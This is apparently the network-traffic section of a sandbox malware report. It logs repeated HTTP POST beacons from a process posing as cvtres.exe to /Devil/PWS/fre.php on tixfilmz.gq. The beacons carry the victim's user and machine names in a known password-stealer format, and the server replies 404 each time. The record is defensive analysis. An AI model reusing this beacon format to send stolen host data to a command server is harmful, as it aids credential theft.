6	192.168.2.3	49748	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:19.613256931 CEST	1037	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:19.630528927 CEST	1037	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:19.732111931 CEST	1038	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=56rajt1WPGe6KnsyYpZpLkWvcP2gK8oIufFApjC%2FlsRIRyLWAm0lgxAy74kgONnMisbKHxHnGCoj54gIwS1elPMY2YeNpmVi5jQ8TAhhFOqYDjKiWLZCRQTUqZHBNg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4dd09aad6940-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.3	49881	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:50.015660048 CEST	9837	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:50.032645941 CEST	9837	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:50.116230011 CEST	9838	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yYs5xGZmn0bbEItP9NqwtmTWoqccfvVeGOdajUor7qMWqijvuJJLkrQMHxpH8hh9w4yik0jbeNva2SzL%2FpuC12ECQYgANqYXeelmanIviQ3Pe3jNt%2BOhtQ1xoWS%2Bvw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e50059fa290a3-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.3	49882	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:51.663594961 CEST	9839	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:51.680593014 CEST	9839	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:51.756084919 CEST	9840	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N7Z3F0l4w%2FyGCWf%2BXM%2BApLe4jGBa6XF%2FUnI1FFrvY7eYRDEMdMyPlNFbsT35j3%2FEqDNEMwT%2F1ao0H%2Br7Nhk1WJUkgVYyRYMHFXsgqbZQMRiG3YeVxGXyCoc%2BxQUsXQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e500fe9db9b71-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.2.3	49883	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:53.308239937 CEST	9841	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:53.325928926 CEST	9841	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:53.422276974 CEST	9842	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6Fd17Zb%2BwPjA3E0zM9dfJ7XwwRlkas9438HGfYUUM0esuZPTVvVDG8CPTnIQGu3bO%2BbJasJNEsA4X1MXNU84ARiXnOa9ZuTJ06F2NFelnoaAx%2FZjEyhaBKlZ%2BrGLLg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e501a3ea19c04-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.2.3	49884	188.114.96.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:54.330408096 CEST	9843	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:54.347251892 CEST	9843	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:54.443857908 CEST	9844	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=En0ibOgeEuMxY2mpHD2Dt3TdC47cwr0p%2B%2FkxieOBFGmpgV0W8IYvn3FdaUu5Dw3eYi89xBOfLEzFvGaVkysT4VQaqP1FJy4AkZCJvdsml9EBR6cH68soksbWjOz2PA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e50209b4692a5-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.2.3	49885	188.114.96.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:55.376396894 CEST	9845	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:55.394433975 CEST	9845	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:55.477446079 CEST	9846	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fRCqN%2B0U%2FIaJlKXxZ0j9RFyfBV2nGu%2Bs3z%2FsZN0sUZyIfeketjJylXcTToil1dlVsJcfYulWZ7AN3gENYb6%2FnTXhsn7WqZfUwLPIOGO3aDtBG%2FjPde0X6n6l2WwZjg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e50272bba9060-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	192.168.2.3	49887	188.114.96.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:43:58.405291080 CEST	9855	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:43:58.422477961 CEST	9855	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:43:58.521328926 CEST	9856	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:43:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PSagRcg%2BXgMM8SLs1fz1sWSt3bmnwStUi%2B9W77wP9McJbCEncWHNRPxRcBP2MEeo4%2BG9DAV%2FyOHi%2Fg70bNZbQEebuoYORKyhvSDwkCg7bgb%2B5KBhVvZvlLt%2BS3qCOw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e503a0f0c9b1f-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	192.168.2.3	49888	188.114.96.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:44:00.133245945 CEST	9857	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:44:00.150311947 CEST	9857	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:44:00.224335909 CEST	9858	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:44:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gCIohsXjHhgi0pQExP2v8aaRoEpTkgH8DUsDtSscarAKN6sCn7smeeWy9hlvBjh8%2BS%2BX1zapu%2B5%2BOZP8efkqrsyWJ3QvXrzyY9TiWrZ%2Fxe%2BhhcbnerbQyw2nP%2BtpFA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e5044da06bba7-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	192.168.2.3	49889	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:44:01.764744997 CEST	9859	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:44:01.781905890 CEST	9859	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:44:01.874361038 CEST	9860	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:44:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pqVP65brrqjsnWByoTI7h%2Beihew4kemEjFaRp39wYal1iwPuhR1mCslnHhL%2BGO7wotp5gPYsoPk9QiiY2rKGIlyolfTNGFDDREhFvp96JrTmCIzOCv6%2Bf2d%2BAnEuOQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e504f0ca29140-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	192.168.2.3	49890	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:44:03.457386971 CEST	9861	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:44:03.474813938 CEST	9861	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:44:03.564661026 CEST	9862	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:44:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UWOk8nrhWsKBKGWXSePgv8dtkyveOyzmxWIMZzvZ8izB2dT7YQLIajfAbJ7oAJ3TKxuCqWiHVj0DQF4T24Rpb8OGZKiBf8VDNmp0wuRdyBsttE%2FFj7le1FIprpYRXw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e5059ae8c9018-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	192.168.2.3	49892	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:44:04.916627884 CEST	9866	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:44:04.933479071 CEST	9867	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:44:05.023818016 CEST	9867	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:44:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KlaIcUFq%2FAKMZr8cKuA7oS9%2F0E%2FRgGaKflZWBKkiJ9ilDyY1Sft%2FkwrTIkWCTxABLWGIMhtPPWfpGj4bz8E23nuql8Rm%2Bdzkjxh4tE3Ibkx0blidQFfJSr%2FOC%2F23lg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e5062ceb69128-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49749	188.114.96.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:42:20.745320082 CEST	1039	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:42:20.762243032 CEST	1039	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:42:20.839010000 CEST	1040	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:42:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ut9B7mf4G17zu3N9HtfdKLQB4vnnYZyFkcj3DiKeaTp6lkOkH0%2BG1RXZfAd1eHXyrbhOy35lhzComx8GvR8btMp2ypwuCSvqRR%2BPT%2FdC4VdZgby%2Bxpk5t%2BA4Fic1SA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e4dd7aae99225-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	192.168.2.3	49895	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:44:06.157277107 CEST	9877	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:44:06.174385071 CEST	9877	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:44:06.249001026 CEST	9878	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:44:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4dWgjRH38pyPZeD0qb0jk1%2F9qOz8xFjDAiF5Gi2i2AeNn31igXE4WwQOWYQHrpOyIGITs3%2Fzw1da6XTCKPX3NE8Mjee42nTkPpxBuY5u2IZKUgW5M0nLaa1piuJcXw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e506a89e19271-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	192.168.2.3	49896	188.114.97.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:44:07.789189100 CEST	9879	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:44:07.806155920 CEST	9879	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Aug 11, 2022 06:44:07.921392918 CEST	9880	IN	HTTP/1.1 404 Not Found Date: Thu, 11 Aug 2022 04:44:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NwDeet%2BtDovGzYKRHtlc%2BIy9CvtPPAj%2FIhJEPstX1Ci1BEnwzlCsGh%2BuTY0Brr6ZBfTS8J8wHhv9vdUzelvtptMWlvXbpzGKUv3k3lh%2FjuysDwLv3KXOt2JS1GaA8w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 738e5074b917bb5b-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	192.168.2.3	49897	188.114.96.3	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Timestamp	kBytes transferred	Direction	Data
Aug 11, 2022 06:44:08.828123093 CEST	9881	OUT	POST /Devil/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tixfilmz.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4ADFFEA8 Content-Length: 163 Connection: close
Aug 11, 2022 06:44:08.845298052 CEST	9881	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
